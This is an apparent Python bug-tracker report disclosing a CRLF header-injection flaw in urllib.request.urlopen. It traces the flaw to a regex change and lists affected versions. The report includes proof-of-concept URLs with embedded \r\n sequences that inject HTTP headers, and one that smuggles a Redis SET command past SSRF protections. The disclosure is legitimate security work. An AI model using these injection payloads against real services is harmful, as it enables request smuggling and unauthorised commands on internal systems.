New submission from Sihoon Lee <push0...@gmail.com>:
this patch can also be broken by path and query string. http://www.cvedetails.com/cve/CVE-2016-5699/ https://bugs.python.org/issue30458 can succeed to inject HTTP header and be more critical by bypassing illegal header check # Vulnerability PoC >>> import urllib.request >>> urllib.request.urlopen('http://127.0.0.1:1234/?q=HTTP/1.1\r\nHeader: >>> Value\r\nHeader2: \r\n') or >>> urllib.request.urlopen('http://127.0.0.1:1234/HTTP/1.1\r\nHeader: >>> Value\r\nHeader2: \r\n') > nc -lv 1234 GET /?q=HTTP/1.1 Header: Value Header2: HTTP/1.1 Accept-Encoding: identity Host: 127.0.0.1:1234 User-Agent: Python-urllib/3.8 Connection: close we can inject headers completely. ## Redis redis also be affected by bypassing SSRF protection checking header "host:" with this injection. >>> urllib2.urlopen('http://127.0.0.1:6379/?q=HTTP/1.1\r\nSET VULN >>> POC\r\nHeader2:\r\n').read() '$-1\r\n+OK\r\n-ERR unknown command `Header2:`, with args beginning with: `HTTP/1.1`, \r\n-ERR unknown command `Accept-Encoding:`, with args beginning with: `identity`, \r\n' $ redis-cli 127.0.0.1:6379> GET VULN "POC" # Root Cause https://github.com/python/cpython/commit/cc54c1c0d2d05fe7404ba64c53df4b1352ed2262 - _hostprog = re.compile('^//([^/?]*)(.*)$') + _hostprog = re.compile('//([^/#?]*)(.*)', re.DOTALL) It could succeed to parse host because of re.DOTALL re.DOTALL gave the opportunity of injection. this version of the commit was 3.4.7+ this vulnerability can be affected 3.4.7+ ~ 3.8-dev <- I tested it. also, python 2.7.15 can be affected. I don't know which python2 version is affected because not test. maybe after the commit, all of higher versions can trigger this vulnerability. # Conclusion this patch provides more critical vulnerability to bypass the illegal header check. and we can inject HTTP header completely in urlopen() from this patch. (Although this vulnerability is old on 12 Jul 2017, I don't know why no one has submitted issue still now XDD) ---------- components: Library (Lib) messages: 334896 nosy: push0ebp priority: normal severity: normal status: open title: Header Injection in urllib type: security versions: Python 2.7, Python 3.4, Python 3.5, Python 3.6, Python 3.7, Python 3.8 _______________________________________ Python tracker <rep...@bugs.python.org> <https://bugs.python.org/issue35906> _______________________________________ _______________________________________________ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
